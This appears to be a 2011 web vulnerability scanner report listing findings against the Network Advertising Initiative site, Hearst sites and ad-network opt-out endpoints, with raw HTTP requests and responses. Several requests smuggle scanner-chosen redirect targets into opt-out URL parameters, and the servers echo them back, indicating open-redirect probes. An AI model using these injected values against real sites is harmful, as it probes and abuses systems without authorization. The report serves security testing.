HTTP/1.1 200 OK Connection: close Date: Sat, 17 Sep 2011 17:14:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Type: text/html Expires: Fri, 16 Sep 2011 17:14:24 GMT Cache-control: no-cache <html> <head> <title> Welcome to Network Advertising Initiative </title> <link rel = stylesheet href = "../library/nai <script src="http://ww ...[SNIP]... <td valign=top><img src='http://info.yahoo ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.networkad |
Path: | /yahoo_handler |
GET /yahoo_handler?token=cVRuZVptSHJ4UjM- HTTP/1.1 Host: www.networkadvertising Proxy-Connection: keep-alive Referer: http://www.networkad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDSASBDATQ |
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 16:45:55 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.realage.com |
Path: | / |
GET / HTTP/1.1 Host: www.realage.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Vary: Accept-Encoding P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: max-age=480 Date: Sat, 17 Sep 2011 16:30:15 GMT Content-Length: 106452 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv=" ...[SNIP]... </a> <a class="m1 dd_bor_top" href="http://healthl ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.seventeen.com |
Path: | / |
GET / HTTP/1.1 Host: www.seventeen.com Proxy-Connection: keep-alive Referer: http://hearst.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Vary: Accept-Encoding Cache-Control: max-age=68 Date: Sat, 17 Sep 2011 16:34:01 GMT Content-Length: 103172 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... </div> <form name="login" id="amin" onsubmit="$h.FB.modal <b> ...[SNIP]... </div> <input name="password" id="password" type="password" class="password" /> <div id="button" class="right"> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /z/i.optout |
GET /z/i.optout?f=1&success=//a1bdb9eb3e283ca77/a Host: a.tribalfusion.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: ANON_ID=aXnX9qOZb3V7 |
HTTP/1.1 302 Moved Temporarily P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 306 X-Reuse-Index: 1 Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: private Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 17:18:55 GMT; Content-Type: text/html Location: //a1bdb9eb3e283ca77/a Content-Length: 36 Connection: keep-alive <h1>Error 302 Moved Temporarily</h1> |
Severity: | Low |
Confidence: | Certain |
Host: | http://a1.interclick.com |
Path: | /CookieCheck.aspx |
GET /CookieCheck.aspx?optOut=http%3a//a903690df96 Host: a1.interclick.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: T=1; uid=u=b302c5d5-65f2-40f8 |
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 202 Content-Type: text/html; charset=utf-8 Expires: -1 Location: http://a903690df96c0d1ea Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Sat, 17 Sep 2011 17:11:03 GMT <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://a903690 </body></html> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://a1.interclick.com |
Path: | /optOut.aspx |
GET /optOut.aspx?optOut Host: a1.interclick.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: Opt=out |
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 200 Content-Type: text/html; charset=utf-8 Expires: -1 Location: http://ad7114a2800ce115e Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Sat, 17 Sep 2011 17:19:23 GMT <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="http://ad7114a </body></html> |
Severity: | Low |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /ucm/UCMController |
GET /ucm/UCMController?dtm Host: login.dotomi.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: DotomiUser=230600846 |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:25:17 GMT X-Name: dmc-s02 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, private P3P: "policyref="/w3c/p3p.xml" Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 17:25:17 GMT; Path=/ Location: http://adb1b14aa65246914 Content-Type: text/html Content-Length: 0 |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.ad.us-ec |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.ad.us-ec.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:14:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=1203563412 Location: http://a679410433c098970 Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.adserver |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.adserver.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: criteoastro=1; JEB2=4E4934866E651A2 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:14:41 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=843020230 Location: http://ac81f05a2e5c55470 Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.adserverec |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.adserverec.adtechus User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:14:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=1796067773 Location: http://afc538a7bf167a48a Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.adserverwc |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.adserverwc.adtechus User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:15:38 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=115029846 Location: http://acbd7ee840c3c452/a Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.adsonar.com |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.adsonar.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:14:18 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=1662082667 Location: http://acffaa1b8064c60a5 Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.adtech.de |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.adtech.de User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:15:37 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=1641993715 Location: http://aa0cc007808144dc2 Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.advertising |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.advertising.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: ACID=tX790013123977920032 |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:14:10 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=420140824 Location: http://a2e5eb67f36542514 Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.glb.adtechus |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.glb.adtechus.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:15:15 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=864402709 Location: http://a2b9a138aa9608bd/a Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://nai.tacoda.at |
Path: | /nai/daa.php |
GET /nai/daa.php?action_id=3 Host: nai.tacoda.at.atwola.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: ATTACID=a3Z0aWQ9MTcy |
HTTP/1.1 302 Found Date: Sat, 17 Sep 2011 17:14:29 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Cache-Control: no-cache Pragma: no-cache P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: OO_TOKEN=1084633382 Location: http://a7f7db2ddb3eafdbc Content-Length: 0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://optout.crwdcntrl |
Path: | /optout |
GET /optout?d=http%3a//a2ea61c82b2 Host: optout.crwdcntrl.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: cc=optout |
HTTP/1.1 302 Moved Temporarily Date: Sat, 17 Sep 2011 17:19:45 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Location: http://a2ea61c82b281e19e Vary: Accept-Encoding Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | Low |
Confidence: | Certain |
Host: | http://privacy.revsci.net |
Path: | /optout/optoutv.aspx |
GET /optout/optoutv.aspx?v=2 Host: privacy.revsci.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.networkad Cookie: NETID01=f9891e48fd6c |